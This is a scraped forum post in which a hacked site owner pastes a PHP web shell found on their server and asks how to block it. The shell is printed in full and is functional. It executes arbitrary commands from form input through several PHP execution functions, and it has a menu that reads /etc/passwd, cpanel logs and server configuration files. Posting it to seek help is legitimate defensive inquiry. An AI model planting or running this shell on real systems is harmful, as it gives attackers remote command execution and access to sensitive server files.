Strange php code found on my website


Posted on 16th Feb 2014 07:03 pm by admin

I got hacked and the following code was placed within my files:

Code: [Select]<?
/*
Did you know?Explore Trending and Topic pages for more stories like this.
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
No comments posted yet

Your Answer:

Login to answer
167 Like 46 Dislike
Previous forums Next forums
Other forums

Breaking results into week blocks
I have a set of dates (and times), which are returned from a mySQL query.

These usually span

Multi Level Array Problem
hi all,

For example I have array like below:

$temp = array(array('north america', 'us'

Change log of Cost centre change in Plant maintenance order
Hi,
How to view Change log of Cost centre in Plant maintenance order. Not visible thru 'Docume

RadioButtonList data selection
view plaincopy to clipboardprint?

IF Statement & Two Tables With Different Echoes
I'm retrieving two tables in a single query using UNION ALL, like so:

Code: $query = "SE

Regular expression tips or resources
Hello! I'm having some issues implementing the appropriate regex patter to eliminate unwanted charac

How to use php and sql to check if values match the ones in a table (for logins)
How would I code it that the script takes two variables that are passed to it (UserID and PIN), and

Read from a text file after a specific word
Hi all.

I have a text file that looks like the one below.
I know how to open the text fi

PHP and Javascript
Hi Guys,

Im trying to load the contents of an html file into a text area for editing, this is

Modal Popup Help
Hi guys, I have a modal popup with an iframe. How can i send data from a label or textbox to the ifr

Sign up to write
Sign up now if you have flare of writing..
Login   |   Register
Follow Us
Indyaspeak @ Facebook Indyaspeak @ Twitter Indyaspeak @ Pinterest RSS



Play Free Quiz and Win Cash